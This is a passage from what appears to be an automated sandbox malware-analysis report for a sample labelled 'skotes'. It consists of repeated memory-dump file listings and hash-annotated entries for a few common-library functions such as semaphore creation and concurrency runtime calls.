                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                                                                                                                          • String ID: p[o
                                                                                                                                                                                                                                          • API String ID: 3303180142-804407572
                                                                                                                                                                                                                                          • Opcode ID: 74c9476c7d8d3d8b2be8b1655bf818d443bacdbdfa18ff7b89310af0e1721ed6
                                                                                                                                                                                                                                          • Instruction ID: fc3751bbb5f236971647f85da77bfe612ddc0ab7c90c1ee66a26c302e1946ea2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c9476c7d8d3d8b2be8b1655bf818d443bacdbdfa18ff7b89310af0e1721ed6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D20179B0A056159AEB90BBF865613EE6EE36F09304F60405EF506E7382CF308E818755
                                                                                                                                                                                                                                          Function 006ACAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateSemaphoreExW.KERNEL32(?,006B65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 006ACAFC
                                                                                                                                                                                                                                          • CreateSemaphoreW.KERNEL32(?,006B65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 006ACB1E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateSemaphore
                                                                                                                                                                                                                                          • String ID: ek
                                                                                                                                                                                                                                          • API String ID: 1078844751-651932590
                                                                                                                                                                                                                                          • Opcode ID: c08d214e822829490f0338f08189bbbaa6444515e168798e70f629a72475ebd1
                                                                                                                                                                                                                                          • Instruction ID: e3e6c7b7355f9f71d74984e3f01637cb1388d340e86612044ff8b34a6f3f53df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c08d214e822829490f0338f08189bbbaa6444515e168798e70f629a72475ebd1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF03A36501128ABCF125F40EC048EE7F67EF08761B054050FE155A230C7329C61EFE0
                                                                                                                                                                                                                                          Function 006BB92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 006BB94E
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BB961
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                          • Opcode ID: e282a7295c18bb11bef20c6f5d683b06441ae5efef436d72381991ebf59ae18a
                                                                                                                                                                                                                                          • Instruction ID: 53afbe4347e13dfcd48c267aca0a0f8e5aac5d4e8786d196d1ce7efdce4ab8f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e282a7295c18bb11bef20c6f5d683b06441ae5efef436d72381991ebf59ae18a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE06839B003046BCB00F765D889CADB7BB9EC2B20701801DE611E7381EBB0EE00CAD4
                                                                                                                                                                                                                                          Function 006B34CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B34FC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
